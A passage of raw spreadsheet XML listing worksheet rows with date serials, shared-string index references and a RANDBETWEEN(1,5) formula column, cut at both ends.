        <v>10</v>
      </c>
      <c r="D22226" t="s">
        <v>92</v>
      </c>
      <c r="E22226" t="s">
        <v>20067</v>
      </c>
      <c r="F22226">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22227" s="1">
        <v>43052.667372685188</v>
      </c>
      <c r="C22227" t="s">
        <v>10</v>
      </c>
      <c r="D22227" t="s">
        <v>107</v>
      </c>
      <c r="E22227" t="s">
        <v>20068</v>
      </c>
      <c r="F22227">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22228" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22228" s="1">
        <v>43052.641076388885</v>
      </c>
      <c r="C22228" t="s">
        <v>10</v>
      </c>
      <c r="D22228" t="s">
        <v>263</v>
      </c>
      <c r="E22228" s="2" t="s">
        <v>20069</v>
      </c>
      <c r="F22228">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22229" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22229" s="1">
        <v>43052.638020833336</v>
      </c>
      <c r="C22229" t="s">
        <v>6</v>
      </c>
      <c r="D22229" t="s">
        <v>194</v>
      </c>
      <c r="E22229" s="2" t="s">
        <v>20070</v>
      </c>
      <c r="F22229">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22230" s="1">
        <v>43052.621608796297</v>
      </c>
      <c r="C22230" t="s">
        <v>10</v>
      </c>
      <c r="D22230" t="s">
        <v>381</v>
      </c>
      <c r="E22230" t="s">
        <v>20071</v>
      </c>
      <c r="F22230">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22231" s="1">
        <v>43052.615914351853</v>
      </c>
      <c r="C22231" t="s">
        <v>10</v>
      </c>
      <c r="D22231" t="s">
        <v>163</v>
      </c>
      <c r="E22231" t="s">
        <v>20072</v>
      </c>
      <c r="F22231">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22232" s="1">
        <v>43052.599710648145</v>
      </c>
      <c r="C22232" t="s">
        <v>10</v>
      </c>
      <c r="D22232" t="s">
        <v>36</v>
      </c>
      <c r="E22232" t="s">
        <v>20073</v>
      </c>
      <c r="F22232">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22233" s="1">
        <v>43052.59951388889</v>
      </c>
      <c r="C22233" t="s">
        <v>10</v>
      </c>
      <c r="D22233" t="s">
        <v>36</v>
      </c>
      <c r="E22233" t="s">
        <v>20073</v>
      </c>
      <c r="F22233">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22234" s="1">
        <v>43052.59747685185</v>
      </c>
      <c r="C22234" t="s">
        <v>10</v>
      </c>
      <c r="D22234" t="s">
        <v>151</v>
      </c>
      <c r="E22234" t="s">
        <v>20074</v>
      </c>
      <c r="F22234">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22235" s="1">
        <v>43052.593414351853</v>
      </c>
      <c r="C22235" t="s">
        <v>10</v>
      </c>
      <c r="D22235" t="s">
        <v>6</v>
      </c>
      <c r="E22235" t="s">
        <v>8548</v>
      </c>
      <c r="F22235">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22236" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22236" s="1">
        <v>43052.557233796295</v>
      </c>
      <c r="C22236" t="s">
        <v>71</v>
      </c>
      <c r="E22236" s="2" t="s">
        <v>20075</v>
      </c>
      <c r="F22236">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22237" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A22237" s="1">
        <v>43052.486597222225</v>
      </c>
      <c r="C22237" t="s">
        <v>10</v>
      </c>
      <c r="D22237" t="s">
        <v>244</v>
      </c>
      <c r="E22237" s="2" t="s">
        <v>20076</v>
      </c>
      <c r="F22237">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22238" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22238" s="1">
        <v>43052.482199074075</v>
      </c>
      <c r="C22238" t="s">
        <v>6</v>
      </c>
      <c r="D22238" t="s">
        <v>25</v>
      </c>
      <c r="E22238" s="2" t="s">
        <v>20077</v>
      </c>
      <c r="F22238">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22239" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22239" s="1">
        <v>43052.481446759259</v>
      </c>
      <c r="C22239" t="s">
        <v>48</v>
      </c>
      <c r="E22239" s="2" t="s">
        <v>20078</v>
      </c>
      <c r="F22239">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22240" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22240" s="1">
        <v>43052.475891203707</v>
      </c>
      <c r="C22240" t="s">
        <v>6</v>
      </c>
      <c r="D22240" t="s">
        <v>25</v>
      </c>
      <c r="E22240" s="2" t="s">
        <v>20079</v>
      </c>
      <c r="F22240">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22241" s="1">
        <v>43052.463506944441</v>
      </c>
      <c r="C22241" t="s">
        <v>189</v>
      </c>
      <c r="D22241" t="s">
        <v>92</v>
      </c>
      <c r="E22241" t="s">
        <v>20080</v>
      </c>
      <c r="F22241">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22242" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22242" s="1">
        <v>43052.452233796299</v>
      </c>
      <c r="C22242" t="s">
        <v>559</v>
      </c>
      <c r="E22242" s="2" t="s">
        <v>20081</v>
      </c>
      <c r="F22242">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22243" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A22243" s="1">
        <v>43052.446817129632</v>
      </c>
      <c r="C22243" t="s">
        <v>10</v>
      </c>
      <c r="D22243" t="s">
        <v>271</v>
      </c>
      <c r="E22243" s="2" t="s">
        <v>20082</v>
      </c>
      <c r="F22243">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22244" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22244" s="1">
        <v>43052.445671296293</v>
      </c>
      <c r="C22244" t="s">
        <v>43</v>
      </c>
      <c r="E22244" s="2" t="s">
        <v>20083</v>
      </c>
      <c r="F22244">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22245" s="1">
        <v>43052.442418981482</v>
      </c>
      <c r="C22245" t="s">
        <v>6</v>
      </c>
      <c r="D22245" t="s">
        <v>25</v>
      </c>
      <c r="E22245" t="s">
        <v>20084</v>
      </c>
      <c r="F22245">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22246" s="1">
        <v>43052.432719907411</v>
      </c>
      <c r="C22246" t="s">
        <v>10</v>
      </c>
      <c r="D22246" t="s">
        <v>36</v>
      </c>
      <c r="E22246" t="s">
        <v>20085</v>
      </c>
      <c r="F22246">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22247" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A22247" s="1">
        <v>43052.422395833331</v>
      </c>
      <c r="C22247" t="s">
        <v>41</v>
      </c>
      <c r="E22247" s="2" t="s">
        <v>20086</v>
      </c>
      <c r="F22247">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22248" s="1">
        <v>43052.385763888888</v>
      </c>
      <c r="C22248" t="s">
        <v>10</v>
      </c>
      <c r="D22248" t="s">
        <v>374</v>
      </c>
      <c r="E22248" t="s">
        <v>20087</v>
      </c>
      <c r="F22248">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22249" s="1">
        <v>43052.379652777781</v>
      </c>
      <c r="C22249" t="s">
        <v>6</v>
      </c>
      <c r="D22249" t="s">
        <v>25</v>
      </c>
      <c r="E22249" t="s">
        <v>20088</v>
      </c>
      <c r="F22249">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22250" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22250" s="1">
        <v>43052.371620370373</v>
      </c>
      <c r="C22250" t="s">
        <v>48</v>
      </c>
      <c r="E22250" s="2" t="s">
        <v>20089</v>
      </c>
      <c r="F22250">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22251" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A22251" s="1">
        <v>43052.281215277777</v>
      </c>
      <c r="C22251" t="s">
        <v>4852</v>
      </c>
      <c r="D22251" t="s">
        <v>14</v>
      </c>
      <c r="E22251" s="2" t="s">
        <v>20090</v>
      </c>
      <c r="F22251">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22252" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22252" s="1">
        <v>43052.241875</v>
      </c>
      <c r="C22252" t="s">
        <v>686</v>
      </c>
      <c r="D22252" t="s">
        <v>1056</v>
      </c>
      <c r="E22252" s="2" t="s">
        <v>20091</v>
      </c>
      <c r="F22252">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22253" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22253" s="1">
        <v>43052.2340625</v>
      </c>
      <c r="C22253" t="s">
        <v>124</v>
      </c>
      <c r="E22253" s="2" t="s">
        <v>20092</v>
      </c>
      <c r="F22253">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22254" s="1">
        <v>43052.20821759259</v>
      </c>
      <c r="C22254" t="s">
        <v>73</v>
      </c>
      <c r="E22254" t="s">
        <v>20093</v>
      </c>
      <c r="F22254">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22255" s="1">
        <v>43052.20412037037</v>
      </c>
      <c r="C22255" t="s">
        <v>41</v>
      </c>
      <c r="F22255">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22256" s="1">
        <v>43052.196469907409</v>
      </c>
      <c r="C22256" t="s">
        <v>48</v>
      </c>
      <c r="E22256" t="s">
        <v>20094</v>
      </c>
      <c r="F22256">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22257" s="1">
        <v>43052.190949074073</v>
      </c>
      <c r="C22257" t="s">
        <v>48</v>
      </c>
      <c r="E22257" t="s">
        <v>20095</v>
      </c>
      <c r="F22257">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22258" s="1">
        <v>43052.178379629629</v>
      </c>
      <c r="C22258" t="s">
        <v>41</v>
      </c>
      <c r="E22258" t="s">
        <v>20096</v>
      </c>
      <c r="F22258">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22259" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A22259" s="1">
        <v>43052.156828703701</v>
      </c>
      <c r="C22259" t="s">
        <v>907</v>
      </c>
      <c r="E22259" s="2" t="s">
        <v>20097</v>
      </c>
      <c r="F22259">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22260" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22260" s="1">
        <v>43052.154641203706</v>
      </c>
      <c r="C22260" t="s">
        <v>318</v>
      </c>
      <c r="E22260" s="2" t="s">
        <v>20098</v>
      </c>
      <c r="F22260">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22261" s="1">
        <v>43052.141516203701</v>
      </c>
      <c r="C22261" t="s">
        <v>41</v>
      </c>
      <c r="F22261">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22262" s="1">
        <v>43052.119537037041</v>
      </c>
      <c r="C22262" t="s">
        <v>6431</v>
      </c>
      <c r="D22262" t="s">
        <v>721</v>
      </c>
      <c r="E22262" t="s">
        <v>20099</v>
      </c>
      <c r="F22262">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22263" s="1">
        <v>43052.032685185186</v>
      </c>
      <c r="C22263" t="s">
        <v>10</v>
      </c>
      <c r="D22263" t="s">
        <v>178</v>
      </c>
      <c r="E22263" t="s">
        <v>20100</v>
      </c>
      <c r="F22263">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22264" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22264" s="1">
        <v>43051.935243055559</v>
      </c>
      <c r="C22264" t="s">
        <v>92</v>
      </c>
      <c r="E22264" s="2" t="s">
        <v>20101</v>
      </c>
      <c r="F22264">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22265" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22265" s="1">
        <v>43051.904317129629</v>
      </c>
      <c r="C22265" t="s">
        <v>41</v>
      </c>
      <c r="E22265" s="2" t="s">
        <v>20102</v>
      </c>
      <c r="F22265">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22266" s="1">
        <v>43051.90053240741</v>
      </c>
      <c r="C22266" t="s">
        <v>140</v>
      </c>
      <c r="D22266" t="s">
        <v>141</v>
      </c>
      <c r="E22266" t="s">
        <v>20103</v>
      </c>
      <c r="F22266">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22267" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22267" s="1">
        <v>43051.816435185188</v>
      </c>
      <c r="C22267" t="s">
        <v>140</v>
      </c>
      <c r="D22267" t="s">
        <v>141</v>
      </c>
      <c r="E22267" s="2" t="s">
        <v>20104</v>
      </c>
      <c r="F22267">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22268" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22268" s="1">
        <v>43051.787395833337</v>
      </c>
      <c r="C22268" t="s">
        <v>845</v>
      </c>
      <c r="E22268" s="2" t="s">
        <v>20105</v>
      </c>
      <c r="F22268">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22269" s="1">
        <v>43051.71603009259</v>
      </c>
      <c r="C22269" t="s">
        <v>260</v>
      </c>
      <c r="D22269" t="s">
        <v>1036</v>
      </c>
      <c r="E22269" t="s">
        <v>20106</v>
      </c>
      <c r="F22269">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22270" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22270" s="1">
        <v>43051.701550925929</v>
      </c>
      <c r="C22270" t="s">
        <v>8872</v>
      </c>
      <c r="D22270" t="s">
        <v>7</v>
      </c>
      <c r="E22270" s="2" t="s">
        <v>20107</v>
      </c>
      <c r="F22270">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22271" s="1">
        <v>43051.654826388891</v>
      </c>
      <c r="C22271" t="s">
        <v>14</v>
      </c>
      <c r="D22271" t="s">
        <v>46</v>
      </c>
      <c r="E22271" t="s">
        <v>20108</v>
      </c>
      <c r="F22271">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22272" s="1">
        <v>43051.629201388889</v>
      </c>
      <c r="C22272" t="s">
        <v>173</v>
      </c>
      <c r="D22272" t="s">
        <v>1993</v>
      </c>
      <c r="E22272" t="s">
        <v>20109</v>
      </c>
      <c r="F22272">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22273" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22273" s="1">
        <v>43051.278761574074</v>
      </c>
      <c r="C22273" t="s">
        <v>41</v>
      </c>
      <c r="E22273" s="2" t="s">
        <v>20110</v>
      </c>
      <c r="F22273">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22274" s="1">
        <v>43051.234016203707</v>
      </c>
      <c r="C22274" t="s">
        <v>3163</v>
      </c>
      <c r="D22274" t="s">
        <v>494</v>
      </c>
      <c r="E22274" t="s">
        <v>20111</v>
      </c>
      <c r="F22274">
        <f t="shared" ref="F22274:F22337" ca="1" si="348">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="22275" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A22275" s="1">
        <v>43050.687662037039</v>
      </c>
      <c r="C22275" t="s">
        <v>9957</v>
      </c>
      <c r="D22275" t="s">
        <v>192</v>
      </c>
      <c r="E22275" s="2" t="s">
        <v>20112</v>
      </c>
      <c r="F22275">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22276" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22276" s="1">
        <v>43050.612442129626</v>
      </c>
      <c r="C22276" t="s">
        <v>10</v>
      </c>
      <c r="D22276" t="s">
        <v>80</v>
      </c>
      <c r="E22276" s="2" t="s">
        <v>20113</v>
      </c>
      <c r="F22276">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22277" s="1">
        <v>43050.407476851855</v>
      </c>
      <c r="C22277" t="s">
        <v>301</v>
      </c>
      <c r="E22277" t="s">
        <v>20114</v>
      </c>
      <c r="F22277">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22278" s="1">
        <v>43050.387928240743</v>
      </c>
      <c r="C22278" t="s">
        <v>430</v>
      </c>
      <c r="E22278">
        <v>1</v>
      </c>
      <c r="F22278">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22279" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A22279" s="1">
        <v>43050.285196759258</v>
      </c>
      <c r="C22279" t="s">
        <v>454</v>
      </c>
      <c r="D22279" t="s">
        <v>41</v>
      </c>
      <c r="E22279" s="2" t="s">
        <v>20115</v>
      </c>
      <c r="F22279">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22280" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22280" s="1">
        <v>43050.162731481483</v>
      </c>
      <c r="C22280" t="s">
        <v>808</v>
      </c>
      <c r="D22280" t="s">
        <v>67</v>
      </c>
      <c r="E22280" s="2" t="s">
        <v>20116</v>
      </c>
      <c r="F22280">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22281" s="1">
        <v>43050.124930555554</v>
      </c>
      <c r="C22281" t="s">
        <v>41</v>
      </c>
      <c r="D22281" t="s">
        <v>312</v>
      </c>
      <c r="E22281" t="s">
        <v>20117</v>
      </c>
      <c r="F22281">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22282" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A22282" s="1">
        <v>43050.068819444445</v>
      </c>
      <c r="C22282" t="s">
        <v>41</v>
      </c>
      <c r="E22282" s="2" t="s">
        <v>20118</v>
      </c>
      <c r="F22282">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22283" s="1">
        <v>43049.84101851852</v>
      </c>
      <c r="C22283" t="s">
        <v>6</v>
      </c>
      <c r="D22283" t="s">
        <v>25</v>
      </c>
      <c r="F22283">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22284" s="1">
        <v>43049.840833333335</v>
      </c>
      <c r="C22284" t="s">
        <v>6</v>
      </c>
      <c r="D22284" t="s">
        <v>25</v>
      </c>
      <c r="F22284">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22285" s="1">
        <v>43049.840648148151</v>
      </c>
      <c r="C22285" t="s">
        <v>6</v>
      </c>
      <c r="D22285" t="s">
        <v>25</v>
      </c>
      <c r="F22285">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22286" s="1">
        <v>43049.840428240743</v>
      </c>
      <c r="C22286" t="s">
        <v>6</v>
      </c>
      <c r="D22286" t="s">
        <v>25</v>
      </c>
      <c r="F22286">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22287" s="1">
        <v>43049.791608796295</v>
      </c>
      <c r="C22287" t="s">
        <v>2733</v>
      </c>
      <c r="D22287" t="s">
        <v>151</v>
      </c>
      <c r="E22287" t="s">
        <v>20119</v>
      </c>
      <c r="F22287">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22288" s="1">
        <v>43049.755624999998</v>
      </c>
      <c r="C22288" t="s">
        <v>845</v>
      </c>
      <c r="D22288" t="s">
        <v>17</v>
      </c>
      <c r="E22288" t="s">
        <v>20120</v>
      </c>
      <c r="F22288">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22289" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22289" s="1">
        <v>43049.750972222224</v>
      </c>
      <c r="C22289" t="s">
        <v>140</v>
      </c>
      <c r="D22289" t="s">
        <v>234</v>
      </c>
      <c r="E22289" s="2" t="s">
        <v>20121</v>
      </c>
      <c r="F22289">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22290" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22290" s="1">
        <v>43049.729872685188</v>
      </c>
      <c r="C22290" t="s">
        <v>10</v>
      </c>
      <c r="D22290" t="s">
        <v>11</v>
      </c>
      <c r="E22290" s="2" t="s">
        <v>20122</v>
      </c>
      <c r="F22290">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22291" s="1">
        <v>43049.688055555554</v>
      </c>
      <c r="C22291" t="s">
        <v>16</v>
      </c>
      <c r="E22291" t="s">
        <v>20123</v>
      </c>
      <c r="F22291">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22292" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22292" s="1">
        <v>43049.647951388892</v>
      </c>
      <c r="C22292" t="s">
        <v>222</v>
      </c>
      <c r="E22292" s="2" t="s">
        <v>20124</v>
      </c>
      <c r="F22292">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22293" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22293" s="1">
        <v>43049.644120370373</v>
      </c>
      <c r="C22293" t="s">
        <v>318</v>
      </c>
      <c r="E22293" s="2" t="s">
        <v>20125</v>
      </c>
      <c r="F22293">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22294" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22294" s="1">
        <v>43049.612280092595</v>
      </c>
      <c r="C22294" t="s">
        <v>6</v>
      </c>
      <c r="D22294" t="s">
        <v>25</v>
      </c>
      <c r="E22294" s="2" t="s">
        <v>20126</v>
      </c>
      <c r="F22294">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22295" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22295" s="1">
        <v>43049.56790509259</v>
      </c>
      <c r="C22295" t="s">
        <v>10</v>
      </c>
      <c r="D22295" t="s">
        <v>632</v>
      </c>
      <c r="E22295" s="2" t="s">
        <v>20127</v>
      </c>
      <c r="F22295">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22296" s="1">
        <v>43049.563611111109</v>
      </c>
      <c r="C22296" t="s">
        <v>280</v>
      </c>
      <c r="E22296" t="s">
        <v>20128</v>
      </c>
      <c r="F22296">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22297" s="1">
        <v>43049.522002314814</v>
      </c>
      <c r="C22297" t="s">
        <v>10</v>
      </c>
      <c r="D22297" t="s">
        <v>41</v>
      </c>
      <c r="E22297" t="s">
        <v>20129</v>
      </c>
      <c r="F22297">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22298" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22298" s="1">
        <v>43049.518761574072</v>
      </c>
      <c r="C22298" t="s">
        <v>10</v>
      </c>
      <c r="D22298" t="s">
        <v>6</v>
      </c>
      <c r="E22298" s="2" t="s">
        <v>20130</v>
      </c>
      <c r="F22298">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22299" s="1">
        <v>43049.497453703705</v>
      </c>
      <c r="C22299" t="s">
        <v>6</v>
      </c>
      <c r="D22299" t="s">
        <v>25</v>
      </c>
      <c r="F22299">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22300" s="1">
        <v>43049.486064814817</v>
      </c>
      <c r="C22300" t="s">
        <v>10</v>
      </c>
      <c r="D22300" t="s">
        <v>89</v>
      </c>
      <c r="E22300" t="s">
        <v>20131</v>
      </c>
      <c r="F22300">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22301" s="1">
        <v>43049.485208333332</v>
      </c>
      <c r="C22301" t="s">
        <v>6</v>
      </c>
      <c r="D22301" t="s">
        <v>25</v>
      </c>
      <c r="E22301" t="s">
        <v>20132</v>
      </c>
      <c r="F22301">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22302" s="1">
        <v>43049.477233796293</v>
      </c>
      <c r="C22302" t="s">
        <v>48</v>
      </c>
      <c r="E22302" t="s">
        <v>20133</v>
      </c>
      <c r="F22302">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22303" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22303" s="1">
        <v>43049.458148148151</v>
      </c>
      <c r="C22303" t="s">
        <v>10</v>
      </c>
      <c r="D22303" t="s">
        <v>263</v>
      </c>
      <c r="E22303" s="2" t="s">
        <v>20134</v>
      </c>
      <c r="F22303">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22304" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22304" s="1">
        <v>43049.430914351855</v>
      </c>
      <c r="C22304" t="s">
        <v>71</v>
      </c>
      <c r="E22304" s="2" t="s">
        <v>20135</v>
      </c>
      <c r="F22304">
